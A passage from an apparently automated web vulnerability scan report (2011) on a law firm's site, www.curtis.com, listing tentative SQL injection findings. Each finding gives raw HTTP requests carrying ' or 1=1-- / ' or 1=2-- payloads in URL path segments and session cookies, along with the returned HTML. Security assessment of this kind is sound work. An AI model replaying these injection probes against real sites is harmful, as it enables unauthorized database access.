Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts23520338'%20or%201%3d2--%20/DateRange/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.32. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15465428'%20or%201%3d1--%20 and 15465428'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange15465428'%20or%201%3d1--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange15465428'%20or%201%3d2--%20/ipopeng.htm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.33. http://www.curtis.com/scripts/DateRange/ipopeng.htm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/DateRange/ipopeng.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 13057657'%20or%201%3d1--%20 and 13057657'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearc
...[SNIP]...

Request 2

GET /scripts/DateRange/ipopeng.htm13057657'%20or%201%3d2--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/sitecontent.cfm?pageid=13
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.4.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::staticcontent::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.forms["attorneysearch"].firstlastname.value.length == 0)||(document.forms["attorneysearch"].firstlastname.value == "Enter Attorney Name")){
       alert('Please enter an attorneys first or last name for your search.');
       document.forms["attorneysearch"].firstlastname.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 8pt;
}
body {
   background-color: #FFF;
   margin-left: 0px;
   margin-top: 10px;
   margin-right: 0px;
   margin-bottom: 10px;
}
--
...[SNIP]...

1.34. http://www.curtis.com/scripts/carousel/getimages.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 17874711%20or%201%3d1--%20 and 17874711%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=617584317874711%20or%201%3d1--%20; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 21-Apr-2010 12:09:11 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=617584317874711%20or%201%3d2--%20; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6215435;path=/
Set-Cookie: CFTOKEN=62237604;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.35. http://www.curtis.com/scripts/carousel/getimages.cfm [CFTOKEN cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 92379312%20or%201%3d1--%20 and 92379312%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=3257569792379312%20or%201%3d1--%20; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Wed, 21-Apr-2010 12:09:19 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=3257569792379312%20or%201%3d2--%20; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6215470;path=/
Set-Cookie: CFTOKEN=50468307;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.36. http://www.curtis.com/scripts/carousel/getimages.cfm [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 75027296'%20or%201%3d1--%20 and 75027296'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm75027296'%20or%201%3d1--%20 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
